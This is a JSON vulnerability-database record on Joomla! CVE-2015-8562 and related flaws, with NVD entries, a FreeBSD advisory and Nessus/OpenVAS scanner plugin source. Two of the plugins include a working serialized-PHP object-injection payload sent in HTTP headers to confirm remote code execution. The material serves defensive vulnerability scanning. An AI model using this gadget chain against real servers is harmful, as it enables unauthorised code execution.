value:\"2015/12/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nversion = install['version'];\ninstall_loc = build_url(port:port, qs:install['path']);\nfix = \"3.4.6\";\n\n# Pull out the purely numeric version\nnumeric = eregmatch(string:version, pattern:\"^([0-9\\.]+)($|[^0-9])\");\n\nif (empty_or_null(numeric))\n audit(AUDIT_UNKNOWN_WEB_APP_VER, app, install_loc);\n\nnumeric = numeric[1];\n\nif (numeric == \"3.4\")\n audit(AUDIT_VER_NOT_GRANULAR, app, version);\n\n# Version 1.5.0 - 3.4.5 vulnerable to RCE\nif (ver_compare(ver:numeric, fix:\"1.5.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:numeric, fix:fix, strict:FALSE) < 0)\n{\n order = make_list(\"URL\", \"Installed version\", \"Fixed version\");\n report = make_array(\n order[0], install_loc,\n order[1], version,\n order[2], fix\n );\n report = report_items_str(report_items:report, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE, xsrf:TRUE);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_loc, version);\n", "naslFamily": "CGI abuses", "pluginID": "87416", "cpe": ["cpe:/a:joomla:joomla\\!"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to have unspecified impact via unknown vectors.", "modified": "2015-12-17T17:30:00", "id": "CVE-2015-8565", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8565", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8565", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in the com_templates component in Joomla! 3.2.0 through 3.3.x and 3.4.x before 3.4.6 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.", "modified": "2015-12-17T17:28:00", "id": "CVE-2015-8563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8563", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8563", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Joomla! 3.4.x before 3.4.6 allows remote attackers to have unspecified impact via directory traversal sequences in the XML install file in an extension package archive.", "modified": "2015-12-17T17:30:00", "id": "CVE-2015-8564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8564", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8564", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Joomla! 
1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.", "modified": "2018-10-09T19:58:00", "id": "CVE-2015-8562", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8562", "published": "2015-12-16T21:59:00", "title": "CVE-2015-8562", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:56", "bulletinFamily": "unix", "description": "\nThe JSST and the Joomla! Security Center report:\n\n[20151201] - Core - Remote Code Execution Vulnerability\nBrowser information is not filtered properly while saving the\n\t session values into the database which leads to a Remote Code\n\t Execution vulnerability.\n\n\n[20151202] - Core - CSRF Hardening\nAdd additional CSRF hardening in com_templates.\n\n\n[20151203] - Core - Directory Traversal\nFailure to properly sanitize input data from the XML install file\n\t located within an extension's package archive allows for directory\n\t traversal.\n\n\n[20151204] - Core - Directory Traversal\nInadequate filtering of request data leads to a Directory Traversal\n\t vulnerability.\n\n", "modified": "2016-12-22T00:00:00", "published": "2015-12-14T00:00:00", "id": "A9F60CE8-A4E0-11E5-B864-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/a9f60ce8-a4e0-11e5-b864-14dae9d210b8.html", "title": "joomla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:41", "bulletinFamily": "scanner", "description": "Joomla! is prone to remote code-execution vulnerability.", "modified": "2018-11-21T00:00:00", "published": "2015-12-16T00:00:00", "id": "OPENVAS:1361412562310105486", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105486", "title": "Joomla! 
Core Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_79195.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Joomla! Core Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:joomla:joomla';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105486\");\n script_bugtraq_id(79195);\n script_cve_id(\"CVE-2015-8562\", \"CVE-2015-8563\", \"CVE-2015-8564\", \"CVE-2015-8565\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 12465 $\");\n script_name(\"Joomla! 
Core Remote Code Execution Vulnerability\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-16 15:35:12 +0100 (Wed, 16 Dec 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/79195\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\n in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response for the\n output of the phpinfo() command.\");\n\n script_tag(name:\"insight\", value:\"Browser information is not filtered properly while saving the session values\n into the database which leads to a Remote Code Execution vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.4.6 or later.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Joomla 1.5.0 through 3.4.5, Joomla 3.2.0 through 3.4.5 and Joomla 3.4.0\n through 3.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! 
dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nvtstrings = get_vt_strings();\n\nif (dir == \"/\")\n dir = \"\";\n\nex = 'phpinfo();JFactory::getConfig();exit';\nex_len = strlen( ex );\n\nagent = '}__' + vtstrings[\"default\"] + '|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"' +\n \"\\0\\0\\0\" + 'disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\"' +\n ':0:{}s:8:\"feed_url\";s:' + ex_len + ':\"' + ex + '\"' +\n ';s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"' +\n \"\\0\\0\\0\" + 'connection\";b:1;}';\n\nagent += '\\xf0\\xfd\\xfd\\xfd';\n\ninjection = make_list( \"User-Agent:\",\"X-Forwarded-For:\" );\n\nhost = http_host_name( port:port );\ncookie = NULL; # nb: To make openvas-nasl-lint happy...\n\nforeach inj ( injection ) {\n for( i = 0; i < 4; i++ ) {\n req = 'GET ' + dir + '/ HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Connection: close\\r\\n';\n\n if( cookie ) req += 'Cookie: ' + cookie + '\\r\\n';\n\n req += 'Accept-Encoding: identity\\r\\n' +\n 'Accept: */*\\r\\n' +\n inj + ' ' + agent + '\\r\\n\\r\\n';\n\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( ! cookie ) {\n co = eregmatch( pattern:'Set-Cookie: ([^\\r\\n]+)', string:buf );\n cookie = co[1];\n }\n\n if( \"<title>phpinfo()</title>\" >< buf ) {\n security_message( port:port );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:02", "bulletinFamily": "scanner", "description": "Joomla! is prone to remote code-execution vulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-12-17T00:00:00", "id": "OPENVAS:1361412562310105487", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105487", "title": "Joomla! 
Core Remote Code Execution Vulnerability (Version Check)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_joomla_79195_3_4_6.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Joomla! Core Remote Code Execution Vulnerability (Version Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:joomla:joomla\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105487\");\n script_bugtraq_id(79195);\n script_cve_id(\"CVE-2015-8562\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"Joomla! 
Core Remote Code Execution Vulnerability (Version Check)\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/79195\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\nin the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed version\");\n\n script_tag(name:\"insight\", value:\"Browser information is not filtered properly while saving the session values\ninto the database which leads to a Remote Code Execution vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.4.6 or later.\");\n\n script_tag(name:\"summary\", value:\"Joomla! is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Joomla 1.5.0 through 3.4.5\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-12-17 11:34:17 +0100 (Thu, 17 Dec 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"joomla/installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! 
infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\n\nversion = infos['version'];\n\nif( version_in_range( version:version, test_version:\"1.5.0\", test_version2:\"3.4.5\" ) ) {\n report = 'Installed version: ' + version + '\\n' +\n 'Fixed version: 3.4.6';\n\n if( infos['location'] ) report += '\\nInstall location: ' + infos['location'] + '\\n';\n\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T07:31:25", "bulletinFamily": "scanner", "description": "The JSST and the Joomla! Security Center report : [20151201] - Core -\nRemote Code Execution Vulnerability Browser information is not\nfiltered properly while saving the session values into the database\nwhich leads to a Remote Code Execution vulnerability. [20151202] -\nCore - CSRF Hardening Add additional CSRF hardening in com_templates.\n[20151203] - Core - Directory Traversal Failure to properly sanitize\ninput data from the XML install file located within an extension", "modified": "2019-12-02T00:00:00", "id": "FREEBSD_PKG_A9F60CE8A4E011E5B86414DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/87483", "published": "2015-12-18T00:00:00", "title": "FreeBSD : joomla -- multiple vulnerabilities (a9f60ce8-a4e0-11e5-b864-14dae9d210b8)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87483);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_cve_id(\"CVE-2015-8562\", \"CVE-2015-8563\", \"CVE-2015-8564\", \"CVE-2015-8565\");\n\n script_name(english:\"FreeBSD : joomla -- multiple vulnerabilities (a9f60ce8-a4e0-11e5-b864-14dae9d210b8)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The JSST and the Joomla! 
Security Center report : [20151201] - Core -\nRemote Code Execution Vulnerability Browser information is not\nfiltered properly while saving the session values into the database\nwhich leads to a Remote Code Execution vulnerability. [20151202] -\nCore - CSRF Hardening Add additional CSRF hardening in com_templates.\n[20151203] - Core - Directory Traversal Failure to properly sanitize\ninput data from the XML install file located within an extension's\npackage archive allows for directory traversal. [20151204] - Core -\nDirectory Traversal Inadequate filtering of request data leads to a\nDirectory Traversal vulnerability.\"\n );\n # https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b06a8fbc\"\n );\n # https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bec8944e\"\n );\n # https://developer.joomla.org/security-centre/633-20151214-core-csrf-hardening.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08e45224\"\n );\n # https://developer.joomla.org/security-centre/634-20151214-core-directory-traversal.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c674f363\"\n );\n # https://developer.joomla.org/security-centre/635-20151214-core-directory-traversal-2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4c388902\"\n );\n # https://vuxml.freebsd.org/freebsd/a9f60ce8-a4e0-11e5-b864-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?408c5832\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:joomla3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"joomla3<3.4.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:51:54", "bulletinFamily": "scanner", "description": "The Joomla! application running on the remote web server is affected\nby a remote code execution vulnerability due to improper sanitization\nof the User-Agent header field when saving session values. An\nunauthenticated, remote attacker can exploit this, via a serialized\nPHP object, to execute arbitrary PHP code.", "modified": "2019-12-02T00:00:00", "id": "JOOMLA_OBJECT_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/88489", "published": "2016-01-29T00:00:00", "title": "Joomla! User-Agent Object Injection RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88489);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2015-8562\");\n script_bugtraq_id(79195);\n script_xref(name:\"EDB-ID\", value:\"38977\");\n script_xref(name:\"EDB-ID\", value:\"39033\");\n\n script_name(english:\"Joomla! 
User-Agent Object Injection RCE\");\n script_summary(english:\"Attempts to execute PHP code by header object injection.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Joomla! application running on the remote web server is affected\nby a remote code execution vulnerability due to improper sanitization\nof the User-Agent header field when saving session values. An\nunauthenticated, remote attacker can exploit this, via a serialized\nPHP object, to execute arbitrary PHP code.\");\n # https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bec8944e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.4.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Joomla HTTP Header Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/12\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nfunction gen_php_object_payload(str)\n{\n local_var objectPayload, injectedCommand, injectionTemplate;\n\n injectedCommand = \"die(md5('\"+str+\"'));\";\n injectionTemplate = injectedCommand+';JFactory::getConfig();exit;';\n\n objectPayload = '}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\\\0\\\\0\\\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}';\n objectPayload += 's:8:\"feed_url\";s:'+strlen(injectionTemplate)+':\"'+injectionTemplate+'\";';\n objectPayload += 's:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\\\0\\\\0\\\\0connection\";b:1;}';\n objectPayload += '\\xf0\\x9d\\x8c\\x86';\n\n return objectPayload;\n}\n\napp = \"Joomla!\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\n\ndir = install['path'];\ninstall_url = build_url(qs:dir, port:port);\n\nhashString = \"NESSUS\" + 
rand_str(charset:\"0123456789\", length:5);\nhashVal = MD5(hashString);\nobjectInjectionPayload = gen_php_object_payload(str: hashString);\n\n# Send object injection payload in User-Agent.\nclear_cookiejar();\nr = http_send_recv3(method: \"GET\",\n item: dir + \"/index.php\",\n port:port,\n add_headers: make_array(\"User-Agent\", objectInjectionPayload),\n exit_on_fail : TRUE\n);\nreq1 = http_last_sent_request();\n\nheaders = parse_http_headers(status_line:r[0], headers:r[1]);\nif (isnull(headers)) audit(AUDIT_WEB_NO_SERVER_HEADER, port);\n\ncookie = headers['set-cookie'];\nif (isnull(cookie)) exit(1, \"Did not receive a session cookie in the first request to the \" +app+ \" install at \" + install_url);\n\n# Check for executed payload in next request\nr = http_send_recv3(\n method : \"GET\",\n item : dir + \"/index.php\",\n port : port,\n add_headers : make_array(\"Cookies\", cookie),\n exit_on_fail : TRUE\n);\n\n# The hash value was not in the response, so the exploit did not work\nif(hexstr(hashVal) >!< r[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n\noutput = strstr(r[2], hexstr(hashVal));\nif (empty_or_null(output)) output = r[2];\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(req1, http_last_sent_request()),\n output : chomp(output)\n);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T07:51:53", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the Joomla!\ninstallation running on the remote web server is prior to 3.4.7. It\nis, therefore, affected by multiple vulnerabilities :\n\n - A SQL injection vulnerability exists due to improper\n sanitization of user-supplied input. 
A remote attacker\n can exploit this to inject or manipulate SQL queries in\n the back-end database, resulting in the manipulation or\n disclosure of arbitrary data.\n\n - A remote code execution vulnerability exists due to\n improper sanitization of session values. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. Note that CVE-2015-8562 was\n addressed in version 3.4.6; however, the core issue\n involves a fix to PHP.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-12-02T00:00:00", "id": "JOOMLA_347.NASL", "href": "https://www.tenable.com/plugins/nessus/87767", "published": "2016-01-06T00:00:00", "title": "Joomla! < 3.4.7 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87767);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2015-8769\");\n script_bugtraq_id(79679);\n\n script_name(english:\"Joomla! < 3.4.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n 